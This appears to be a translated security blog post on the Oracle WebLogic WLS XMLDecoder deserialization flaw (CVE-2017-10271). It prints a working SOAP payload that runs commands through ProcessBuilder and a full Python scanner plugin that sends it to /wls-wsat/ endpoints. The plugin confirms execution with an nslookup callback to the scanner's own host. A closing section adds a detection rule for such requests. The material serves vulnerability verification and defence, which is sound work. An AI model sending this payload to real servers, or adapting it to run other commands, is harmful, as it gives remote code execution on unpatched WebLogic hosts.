I. Principle:
Obviously, readObject is taking the blame again: an XML deserialization vulnerability that leads to command execution.
I can't read Java code, so for the specific principle I can only learn from other people's analysis. Here is a reference article that is written in great detail:
Vulnerability principle
II. How to construct the command-execution payload XML:
```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>nslookup</string> <!-- command name -->
                        </void>
                        <void index="1">
                            <string>%s</string> <!-- Xunfeng's random string, used afterwards to look up the flag string in the HTTP or DNS log -->
                        </void>
                        <void index="2">
                            <string>%s</string> <!-- target IP -->
                        </void>
                    </array>
                    <void method="start"/>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
```
III. Analysis of Xunfeng's PoC:
Here is the verification flow:
1. First send a request to the target address; if the response contains the banner string "Web Services", proceed to the next test. (There has to be a WebLogic there in the first place.)
2. Send a request that POSTs the XML content to the target host. After sleeping for 2 s, request http://%s:8088/{random string} on Xunfeng's own web server, which effectively records the nslookup DNS log. If the lookup was received, the returned result contains YES and the vulnerability exists; otherwise it does not.
```python
#!/usr/bin/python
# coding:utf-8
'''
Xunfeng and its plugins are based on Python 2.
There are two main functions:
get_plugin_info()         returns the plugin information
check(ip, port, timeout)  receives the IP, port and timeout for the Xunfeng main program to call; if it has a return
                          value that evaluates to True, the vulnerability exists and the return value is this scan's
                          result. See the function implementations below for details.
'''

import random
import urllib2
import socket
from time import sleep


def get_plugin_info():
    '''get_plugin_info returns information about this plugin and the vulnerability it detects'''
    plugin_info = {
        "name": "WebLogic WLS RCE CVE-2017-10271",
        "info": "Oracle WebLogic Server WLS安全组件中的缺陷导致远程命令执行",
        "level": "高危",
        "type": "命令执行",
        "author": ".@sinosig",
        "url": "https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html",
        "keyword": "tag:weblogic",
    }
    return plugin_info


def random_str(len):
    '''Return a random string'''
    str1 = ""
    for i in range(len):
        str1 += (random.choice("ABCDEFGH1234567890"))
    return str(str1)


def get_ver_ip(ip):
    '''Return the current server's IP. When the PoC payload produces no echo, Xunfeng's auxiliary HTTP and DNS
    verification services can be used instead'''
    csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    csock.connect((ip, 80))
    (addr, port) = csock.getsockname()
    csock.close()
    return addr


def check(ip, port, timeout):
    '''Main function of this PoC; Xunfeng calls it to perform the vulnerability check'''
    test_str = random_str(6)
    server_ip = get_ver_ip(ip)
    check_url = ['/wls-wsat/CoordinatorPortType', '/wls-wsat/CoordinatorPortType11']

    heads = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'SOAPAction': "",
        'Content-Type': 'text/xml;charset=UTF-8',
    }

    # Payload for this vulnerability
    # The response triggered by this command-execution payload gives no obvious echo or behaviour to judge by, so
    # the author uses nslookup to send a DNS request to the server address obtained from get_ver_ip. If the Xunfeng
    # server receives a DNS request carrying the random string generated by random_str, the vulnerability is
    # judged to exist.
    post_str = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java version="1.8" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                  <array class="java.lang.String" length="3">
                    <void index="0">
                      <string>nslookup</string>
                    </void>
                    <void index="1">
                      <string>%s</string>
                    </void>
                    <void index="2">
                      <string>%s</string>
                    </void>
                  </array>
                  <void method="start"/>
                </void>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>
                ''' % (test_str, server_ip)
    for url in check_url:
        target_url = 'http://' + ip + ':' + str(port) + url.strip()
        req = urllib2.Request(url=target_url, headers=heads)
        if 'Web Services' in urllib2.urlopen(req, timeout=timeout).read():
            req = urllib2.Request(url=target_url, data=post_str, headers=heads)
            try:
                urllib2.urlopen(req, timeout=timeout).read()
            except urllib2.URLError:
                pass
            sleep(2)
            # Request http://{Xunfeng address}:8088/{random string generated for this run}; if it returns YES, the
            # server received the request and the vulnerability exists
            check_result = urllib2.urlopen("http://%s:8088/%s" % (server_ip, test_str), timeout=timeout).read()
            if "YES" in check_result:
                return "Exist CVE-2017-10271"
        else:
            pass
```
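From the defender's side, the same payload structure is also what a WAF or request-log review rule should look for. The following Python 3 check is an added example, not part of the original post or of Xunfeng's code: it parses a /wls-wsat/ POST body and flags a work:WorkContext header that carries java.beans.XMLDecoder instruction tags, as in the PoC above. The sample bodies and the rule name are constructed.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"
# Instruction elements that java.beans.XMLDecoder interprets. A WorkContext header has
# no legitimate reason to carry an XMLDecoder document, so any of these under it is a hit.
DECODER_TAGS = {"java", "object", "new", "method", "void", "array", "string", "class"}


def inspect_wls_request(path, body):
    """Return a finding dict for a suspicious /wls-wsat/ POST body, or None if it looks benign.

    Only the WorkContext header is inspected, since that is the element WebLogic feeds to
    XMLDecoder. Use defusedxml instead of the stdlib parser when deploying this for real.
    """
    if not path.startswith("/wls-wsat/"):
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None  # not XML at all; a different rule's problem
    header = root.find("{%s}Header" % SOAP_NS)
    if header is None:
        return None
    for ctx in header.iter("{%s}WorkContext" % WORK_NS):
        inner = [el for el in ctx.iter() if el is not ctx]
        hit_tags = sorted({el.tag for el in inner if el.tag in DECODER_TAGS})
        if not hit_tags:
            continue
        classes = sorted({el.get("class") for el in inner if el.get("class")})
        return {"rule": "wls-wsat-workcontext-xmldecoder", "tags": hit_tags, "classes": classes}
    return None


# Constructed sample requests (not captured traffic). The first mirrors the structure of the
# PoC payload above; the second is an ordinary WS-AT style envelope without a WorkContext.
SUSPICIOUS_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"><void index="0"><string>nslookup</string></void>
<void index="1"><string>TESTSTR</string></void><void index="2"><string>192.0.2.10</string></void>
</array><void method="start"/></void></java></work:WorkContext></soapenv:Header>
<soapenv:Body/></soapenv:Envelope>"""

BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><wsat:Prepare xmlns:wsat="http://docs.oasis-open.org/ws-tx/wsat/2006/06"/>
</soapenv:Body></soapenv:Envelope>"""
```

The finding lists the XMLDecoder tags and the Java classes named in the header, which is what an analyst needs to triage the alert without re-reading the raw body.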
Learning the new WebLogic vulnerability CVE-2017-3506
Original article: https://www.cnblogs.com/KevinGeorge/p/8127154.html